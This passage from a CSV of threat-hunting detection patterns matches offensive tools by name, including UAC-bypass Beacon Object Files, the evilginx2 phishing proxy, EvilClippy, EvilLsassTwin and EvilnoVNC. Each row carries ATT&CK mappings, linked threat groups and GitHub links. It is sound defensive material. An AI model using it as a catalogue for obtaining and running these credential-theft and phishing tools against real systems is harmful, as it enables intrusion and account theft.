T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","43325" "*EventViewerUAC.x64*",".{0,1000}EventViewerUAC\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","43326" "*EventViewerUAC.x86*",".{0,1000}EventViewerUAC\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","43327" "*EventViewerUAC_BOF*",".{0,1000}EventViewerUAC_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera 
- Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","43328" "*eventvwr_elevator*",".{0,1000}eventvwr_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","43329" "*-EventVwrBypass*",".{0,1000}\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - 
PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43330" "*eversinc33/1.6-C2*",".{0,1000}eversinc33\/1\.6\-C2.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","1","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","43331" "*evilclippy *",".{0,1000}evilclippy\s.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43332" "*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43333" "*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43334" "*EvilClippyManager.*",".{0,1000}EvilClippyManager\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and 
its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43335" "*EvilClippy-master*",".{0,1000}EvilClippy\-master.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43336" "*EvilClippyMenu*",".{0,1000}EvilClippyMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","43337" "*evilfeed.go*",".{0,1000}evilfeed\.go.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","43338" "*evilginx -p *",".{0,1000}evilginx\s\-p\s.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43339" "*evilginx 
-p*",".{0,1000}evilginx\s\-p.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43340" "*evilginx*",".{0,1000}evilginx.{0,1000}","offensive_tool_keyword","evilginx2","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection. This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server.
making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","7","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43341" "*evilginx.exe*",".{0,1000}evilginx\.exe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43342" "*evilginx_linux*",".{0,1000}evilginx_linux.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43343" "*evilginx_windows_*",".{0,1000}evilginx_windows_.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43344" "*evilginx2*",".{0,1000}evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43345" "*evilginx2/releases/*",".{0,1000}evilginx2\/releases\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43346" "*Evilginx2-Phishlets*",".{0,1000}Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","N/A","10","7","670","263","2025-02-06T02:46:16Z","2020-05-13T05:58:43Z","43347" "*evilginx-linux*",".{0,1000}evilginx\-linux.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","#linux","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","43348" "*evilginx-mastery*",".{0,1000}evilginx\-mastery.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black 
Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43349" "*evilginx-v3*",".{0,1000}evilginx\-v3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","43350" "*evilgophish*",".{0,1000}evilgophish.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","43351" "*evilgrade*",".{0,1000}evilgrade.{0,1000}","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. 
and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Framework","https://github.com/infobyte/evilgrade","1","0","N/A","N/A","10","10","1309","284","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z","43352" "*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43353" "*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43354" "*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43355" "*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","43356" "*evilmog/ntlmv1-multi*",".{0,1000}evilmog\/ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43357" "*EvilnoVNC () *",".{0,1000}EvilnoVNC\s\(\)\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux #content","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","43358" "*EvilnoVNC by @JoelGMSec*",".{0,1000}EvilnoVNC\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43359" "*EvilnoVNC Server*",".{0,1000}EvilnoVNC\sServer.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43360" 
"*evilnovnc.Dockerfile*",".{0,1000}evilnovnc\.Dockerfile.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43361" "*EvilnoVNC/run.sh*",".{0,1000}EvilnoVNC\/run\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","43362" "*EvilnoVNC/tmp/*",".{0,1000}EvilnoVNC\/tmp\/.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","43363" "*EvilnoVNC-main*",".{0,1000}EvilnoVNC\-main.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","43364" "*eviloffice.exe *",".{0,1000}eviloffice\.exe\s.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43365" "*eviloffice.exe*",".{0,1000}eviloffice\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for 
creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","43366" "*EvilPayload.ps1*",".{0,1000}EvilPayload\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43367" "*evilpr0ton@protonmail.com*",".{0,1000}evilpr0ton\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43368" "*evil-proxy.gemspec*",".{0,1000}evil\-proxy\.gemspec.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - 
